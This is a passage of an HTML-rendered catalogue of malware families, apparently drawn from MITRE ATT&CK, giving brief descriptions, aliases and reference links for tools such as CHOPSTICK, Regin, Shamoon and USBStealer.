<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0113">https://attack.mitre.org/wiki/Software/S0113</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neteagle"><a class="anchor" href="#_neteagle"></a><a class="link" href="#_neteagle">NETEAGLE</a></h3>
<div class="paragraph">
<p>NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.”[[Citation: FireEye APT30]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1270. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0034">https://attack.mitre.org/wiki/Software/S0034</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_usbstealer"><a class="anchor" href="#_usbstealer"></a><a class="link" href="#_usbstealer">USBStealer</a></h3>
<div class="paragraph">
<p>USBStealer is malware that has used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL.[[Citation: ESET Sednit USBStealer 2014]][[Citation: Kaspersky Sofacy]]</p>
</div>
<div class="paragraph">
<p>Aliases: USBStealer, USB Stealer, Win32/USBStealer</p>
</div>
<div class="paragraph">
<p>USBStealer is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>USBStealer</p>
</li>
<li>
<p>USB Stealer</p>
</li>
<li>
<p>Win32/USBStealer</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1271. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0136">https://attack.mitre.org/wiki/Software/S0136</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/">http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/">https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_calendar"><a class="anchor" href="#_calendar"></a><a class="link" href="#_calendar">CALENDAR</a></h3>
<div class="paragraph">
<p>CALENDAR is malware used by APT1 that mimics legitimate Gmail Calendar traffic.[[Citation: Mandiant APT1]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1272. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0025">https://attack.mitre.org/wiki/Software/S0025</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xagentosx"><a class="anchor" href="#_xagentosx"></a><a class="link" href="#_xagentosx">XAgentOSX</a></h3>
<div class="paragraph">
<p>is a trojan that has been used by APT28 on OS X and appears to be a port of their standard CHOPSTICK or XAgent trojan.[[Citation: XAgentOSX]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1273. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0161">https://attack.mitre.org/wiki/Software/S0161</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_regin"><a class="anchor" href="#_regin"></a><a class="link" href="#_regin">Regin</a></h3>
<div class="paragraph">
<p>Regin is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some Regin timestamps date back to 2003.[[Citation: Kaspersky Regin]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1274. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0019">https://attack.mitre.org/wiki/Software/S0019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2014/11/Kaspersky%20Lab%20whitepaper%20Regin%20platform%20eng.pdf">https://securelist.com/files/2014/11/Kaspersky%20Lab%20whitepaper%20Regin%20platform%20eng.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_autoit"><a class="anchor" href="#_autoit"></a><a class="link" href="#_autoit">AutoIt</a></h3>
<div class="paragraph">
<p>AutoIt is a backdoor that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352.[[Citation: Forcepoint Monsoon]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1275. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0129">https://attack.mitre.org/wiki/Software/S0129</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pteranodon"><a class="anchor" href="#_pteranodon"></a><a class="link" href="#_pteranodon">Pteranodon</a></h3>
<div class="paragraph">
<p>Pteranodon is a custom backdoor used by Gamaredon Group.[[Citation: Palo Alto Gamaredon Feb 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1276. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0147">https://attack.mitre.org/wiki/Software/S0147</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/">https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rarstone"><a class="anchor" href="#_rarstone"></a><a class="link" href="#_rarstone">RARSTONE</a></h3>
<div class="paragraph">
<p>RARSTONE is malware used by the Naikon group that has some characteristics similar to PlugX.[[Citation: Aquino RARSTONE]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1277. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0055">https://attack.mitre.org/wiki/Software/S0055</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/">http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shotput"><a class="anchor" href="#_shotput"></a><a class="link" href="#_shotput">SHOTPUT</a></h3>
<div class="paragraph">
<p>SHOTPUT is a custom backdoor used by APT3.[[Citation: FireEye Clandestine Wolf]]</p>
</div>
<div class="paragraph">
<p>Aliases: SHOTPUT, Backdoor.APT.CookieCutter, Pirpi</p>
</div>
<div class="paragraph">
<p>SHOTPUT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SHOTPUT</p>
</li>
<li>
<p>Backdoor.APT.CookieCutter</p>
</li>
<li>
<p>Pirpi</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1278. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0063">https://attack.mitre.org/wiki/Software/S0063</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html">https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_karagany"><a class="anchor" href="#_trojan_karagany"></a><a class="link" href="#_trojan_karagany">Trojan.Karagany</a></h3>
<div class="paragraph">
<p>Trojan.Karagany is a backdoor primarily used for recon. The source code for it was leaked in 2010 and it is sold on underground forums.[[Citation: Symantec Dragonfly]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1279. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0094">https://attack.mitre.org/wiki/Software/S0094</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kasidet"><a class="anchor" href="#_kasidet"></a><a class="link" href="#_kasidet">Kasidet</a></h3>
<div class="paragraph">
<p>Kasidet is a backdoor that has been dropped by using malicious VBA macros.[[Citation: Zscaler Kasidet]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1280. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0088">https://attack.mitre.org/wiki/Software/S0088</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html">http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chopstick"><a class="anchor" href="#_chopstick"></a><a class="link" href="#_chopstick">CHOPSTICK</a></h3>
<div class="paragraph">
<p>CHOPSTICK is malware family of modular backdoors used by APT28. It has been used from at least November 2012 to August 2016 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases.[[Citation: FireEye APT28]][[Citation: ESET Sednit Part 2]][[Citation: FireEye APT28 January 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: CHOPSTICK, SPLM, Xagent, X-Agent, webhp</p>
</div>
<div class="paragraph">
<p>CHOPSTICK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CHOPSTICK</p>
</li>
<li>
<p>SPLM</p>
</li>
<li>
<p>Xagent</p>
</li>
<li>
<p>X-Agent</p>
</li>
<li>
<p>webhp</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1281. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0023">https://attack.mitre.org/wiki/Software/S0023</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_miniduke"><a class="anchor" href="#_miniduke"></a><a class="link" href="#_miniduke">MiniDuke</a></h3>
<div class="paragraph">
<p>MiniDuke is malware that was used by APT29 from 2010 to 2015. The MiniDuke toolset consists of multiple downloader and backdoor components. The loader has been used with other MiniDuke components as well as in conjunction with CosmicDuke and PinchDuke.[[Citation: F-Secure The Dukes]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1282. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0051">https://attack.mitre.org/wiki/Software/S0051</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bbsrat"><a class="anchor" href="#_bbsrat"></a><a class="link" href="#_bbsrat">BBSRAT</a></h3>
<div class="paragraph">
<p>BBSRAT is malware with remote access tool functionality that has been used in targeted compromises.[[Citation: Palo Alto Networks BBSRAT]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1283. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0127">https://attack.mitre.org/wiki/Software/S0127</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/">http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_elise"><a class="anchor" href="#_elise"></a><a class="link" href="#_elise">Elise</a></h3>
<div class="paragraph">
<p>Elise is a custom backdoor Trojan that appears to be used exclusively by Lotus Blossom. It is part of a larger group of
tools referred to as LStudio, ST Group, and APT0LSTU.[[Citation: Lotus Blossom Jun 2015]]</p>
</div>
<div class="paragraph">
<p>Aliases: Elise, BKDR_ESILE, Page</p>
</div>
<div class="paragraph">
<p>Elise is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Elise</p>
</li>
<li>
<p>BKDR_ESILE</p>
</li>
<li>
<p>Page</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1284. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0081">https://attack.mitre.org/wiki/Software/S0081</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html">https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_biscuit"><a class="anchor" href="#_biscuit"></a><a class="link" href="#_biscuit">BISCUIT</a></h3>
<div class="paragraph">
<p>BISCUIT is a backdoor that has been used by APT1 since as early as 2007.[[Citation: Mandiant APT1]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1285. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0017">https://attack.mitre.org/wiki/Software/S0017</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uroburos"><a class="anchor" href="#_uroburos"></a><a class="link" href="#_uroburos">Uroburos</a></h3>
<div class="paragraph">
<p>Uroburos is a rootkit used by Turla.[[Citation: Kaspersky Turla]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1286. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0022">https://attack.mitre.org/wiki/Software/S0022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/65545/the-epic-turla-operation/">https://securelist.com/analysis/publications/65545/the-epic-turla-operation/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powersource"><a class="anchor" href="#_powersource"></a><a class="link" href="#_powersource">POWERSOURCE</a></h3>
<div class="paragraph">
<p>POWERSOURCE is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped.[[Citation: FireEye FIN7 March 2017]][[Citation: Cisco DNSMessenger March 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: POWERSOURCE, DNSMessenger</p>
</div>
<div class="paragraph">
<p>POWERSOURCE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>POWERSOURCE</p>
</li>
<li>
<p>DNSMessenger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1287. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0145">https://attack.mitre.org/wiki/Software/S0145</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/03/dnsmessenger.html">http://blog.talosintelligence.com/2017/03/dnsmessenger.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html">https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hcdloader"><a class="anchor" href="#_hcdloader"></a><a class="link" href="#_hcdloader">hcdLoader</a></h3>
<div class="paragraph">
<p>hcdLoader is a remote access tool (RAT) that has been used by APT18.[[Citation: Dell Lateral Movement]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1288. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0071">https://attack.mitre.org/wiki/Software/S0071</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/">http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeroaccess"><a class="anchor" href="#_zeroaccess"></a><a class="link" href="#_zeroaccess">Zeroaccess</a></h3>
<div class="paragraph">
<p>Zeroaccess is a kernel-mode Rootkit that attempts to add victims to the ZeroAccess botnet, often for monetary gain.[[Citation: Sophos ZeroAccess]]</p>
</div>
<div class="paragraph">
<p>Aliases: Zeroaccess, Trojan.Zeroaccess</p>
</div>
<div class="paragraph">
<p>Zeroaccess is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zeroaccess</p>
</li>
<li>
<p>Trojan.Zeroaccess</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1289. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0027">https://attack.mitre.org/wiki/Software/S0027</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf">https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_skeleton_key"><a class="anchor" href="#_skeleton_key"></a><a class="link" href="#_skeleton_key">Skeleton Key</a></h3>
<div class="paragraph">
<p>Skeleton Key is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password.Skeleton Key is included as a module in Mimikatz.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1290. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0007">https://attack.mitre.org/wiki/Software/S0007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/">http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shamoon"><a class="anchor" href="#_shamoon"></a><a class="link" href="#_shamoon">Shamoon</a></h3>
<div class="paragraph">
<p>Shamoon is malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. The 2.0 version was seen in 2016 targeting Middle Eastern states.[[Citation: FireEye Shamoon Nov 2016]][[Citation: Palo Alto Shamoon Nov 2016]]</p>
</div>
<div class="paragraph">
<p>Aliases: Shamoon, Disttrack</p>
</div>
<div class="paragraph">
<p>Shamoon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Shamoon</p>
</li>
<li>
<p>Disttrack</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1291. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0140">https://attack.mitre.org/wiki/Software/S0140</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/11/fireeye%20respondsto.html">https://www.fireeye.com/blog/threat-research/2016/11/fireeye%20respondsto.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/">http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_4h_rat"><a class="anchor" href="#_4h_rat"></a><a class="link" href="#_4h_rat">4H RAT</a></h3>
<div class="paragraph">
<p>4H RAT is malware that has been used by Putter Panda since at least 2007.[[Citation: CrowdStrike Putter Panda]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1292. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0065">https://attack.mitre.org/wiki/Software/S0065</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bootrash"><a class="anchor" href="#_bootrash"></a><a class="link" href="#_bootrash">BOOTRASH</a></h3>
<div class="paragraph">
<p>BOOTRASH is a Bootkit that targets Windows operating systems. It has been used by threat actors that target the financial sector.[[Citation: MTrends 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1293. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0114">https://attack.mitre.org/wiki/Software/S0114</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf">https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_china_chopper"><a class="anchor" href="#_china_chopper"></a><a class="link" href="#_china_chopper">China Chopper</a></h3>
<div class="paragraph">
<p>China Chopper is a Threat Group-3390.[[Citation: Dell TG-3390]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1294. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0020">https://attack.mitre.org/wiki/Software/S0020</a></p></td>
</tr>
<tr>
